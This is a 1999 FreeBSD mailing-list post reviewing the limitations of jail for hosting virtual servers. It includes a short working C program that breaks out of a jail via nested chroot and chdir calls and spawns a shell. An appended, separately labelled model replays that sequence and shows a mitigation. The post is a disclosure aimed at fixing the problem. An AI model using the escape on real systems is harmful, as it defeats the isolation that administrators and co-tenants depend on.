Date: Sat, 25 Sep 1999 17:17:12 +0400
From: Alexander Bezroutchko <abb@zenon.net>
To: freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
Subject: about jail
Message-ID: <19990925171712.A80535@zenon.net>
In-Reply-To: <199909251302.RAA58030@grendel.sovlink.ru>; from NT User on Sat, Sep 25, 1999 at 05:02:30PM +0400
References: <199909251302.RAA58030@grendel.sovlink.ru>
Hello,

I am looking for a way to use the jail feature (when it is back-ported to -STABLE) for providing virtual servers with root access (something like www.servetheweb.com). Therefore I am investigating this feature more closely. For now I have encountered the following problems:

* ping and traceroute don't work due to lack of permissions to create an icmp socket.
  I think it is simple to make a workaround for such problems: create a daemon listening on a unix domain socket for requests from a jail. The daemon will take the request and the pid of the requesting process, validate it, process it and return the answer to the client.

* only one IP address is available in a jail
  It is an acceptable limitation, but some daemons would like to use the localhost address (127.0.0.1).

* the whole kernel MIB is readable, and kern.hostname is writable from a jail
  I think we should restrict the information about the system that is available from a jail -- leave readable only the data required for the proper work of libc functions like gethostname, getpagesize, sysconf, etc. If we leave kern.hostname writable from a jail, we should add a new field to `struct jail', say `jailname'. It is necessary to identify exactly which jail a process belongs to. And /proc/<PID>/status must show this value. (I think it will be useful to add displaying `jailname' to ps and probably top.)

* scheduling
  The scheduler must provide an equal time quantum to each jail. I think something like a "fair share scheduler" is required. Are there any plans to implement such a scheme in FreeBSD?

* resource limits
  The current resource limit scheme does not provide enough isolation of jails. For example, chgproccnt() maintains counters of the number of processes per uid, but they are system-wide. So the number of processes running in one jail will affect fork() in another jail. Also it would be great to have the ability to limit the number of simultaneous processes running in a jail and the memory consumed by the whole jail.
* it is possible to escape from a jail
  The following program escapes from a jail (tested under 4.0-19990918-CURRENT):

  /* --- start of example ------------------------- */
  #include <unistd.h>
  #include <assert.h>

  const char *shell = "/bin/sh";
  const char *lowerdir = "/tmp";

  int main(void)
  {
          int i;

          assert(chdir("/") != -1);               /* cwd = the jail's root */
          assert(chroot(lowerdir) != -1);         /* root moves below cwd; cwd is now outside it */
          for (i = 0; i < 32; i++)
                  assert(chdir("..") != -1);      /* ".." is not stopped at the old root */
          assert(chroot(".") != -1);              /* adopt the directory reached as the new root */
          assert(execl(shell, shell, NULL) != -1);
          return 0;
  }
  /* --- end of example --------------------------- */

Does anybody know where I can find more information about well-known methods of breaking chroot? Has anybody already encountered and solved the problems described above, or have any ideas?

-- 
Alexander Bezroutchko, Systems Administrator, Zenon N.S.P.
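As an added illustration, not part of the original mail and not FreeBSD kernel code, the following constructed user-space model replays the posted call sequence under two lookup rules: one where only the movable chroot root bounds `..` (the behaviour reported above), and one where a separate jail root is recorded when the jail is entered and `..` refuses to cross it. The struct, field and function names (`pmodel`, `rdir`, `jdir`, `replay_escape`, and so on) are assumptions made for the model.

```c
#include <stdio.h>
#include <string.h>

#define PATHMAX 256
/* Constructed model of per-process lookup state, not FreeBSD kernel code.
 * Paths are absolute strings and "/" is the real filesystem root. */
struct pmodel {
    char cwd[PATHMAX];   /* current working directory */
    char rdir[PATHMAX];  /* chroot root: moved by every chroot(2) call */
    char jdir[PATHMAX];  /* jail root: set once, when the jail is entered */
    int pin_jail;        /* 1 = lookup also refuses to cross jdir (mitigation) */
};

static void pm_enter_jail(struct pmodel *p, const char *root, int pin_jail) {
    snprintf(p->cwd, PATHMAX, "%s", root);
    snprintf(p->rdir, PATHMAX, "%s", root);
    snprintf(p->jdir, PATHMAX, "%s", root);
    p->pin_jail = pin_jail;
}

/* One ".." step: strip the last component unless cwd is a directory that
 * lookup treats as a root. Without pin_jail only rdir and the real root
 * count, so a cwd left outside a freshly moved rdir keeps walking up. */
static void pm_dotdot(struct pmodel *p) {
    if (strcmp(p->cwd, "/") == 0 || strcmp(p->cwd, p->rdir) == 0) return;
    if (p->pin_jail && strcmp(p->cwd, p->jdir) == 0) return;
    char *s = strrchr(p->cwd, '/');
    if (s == p->cwd) s[1] = '\0'; else *s = '\0';
}

/* chroot(2) on "." or on a name relative to cwd. */
static void pm_chroot(struct pmodel *p, const char *rel) {
    if (strcmp(rel, ".") == 0)
        snprintf(p->rdir, PATHMAX, "%s", p->cwd);
    else
        snprintf(p->rdir, PATHMAX, "%s/%s", strcmp(p->cwd, "/") ? p->cwd : "", rel);
}

/* Replay the posted program's call sequence from a jail rooted at /jail
 * and return the root directory the process ends up with. */
const char *replay_escape(int pin_jail, char *out, size_t outlen) {
    struct pmodel p;
    pm_enter_jail(&p, "/jail", pin_jail);
    pm_chroot(&p, "tmp");                /* rdir = /jail/tmp, cwd still /jail */
    for (int i = 0; i < 32; i++) pm_dotdot(&p);
    pm_chroot(&p, ".");                  /* adopt wherever cwd ended up */
    snprintf(out, outlen, "%s", p.rdir);
    return out;
}
```

With `pin_jail` set, the pinned jail root stops the walk at /jail and the final chroot changes nothing; without it the process ends with the real root.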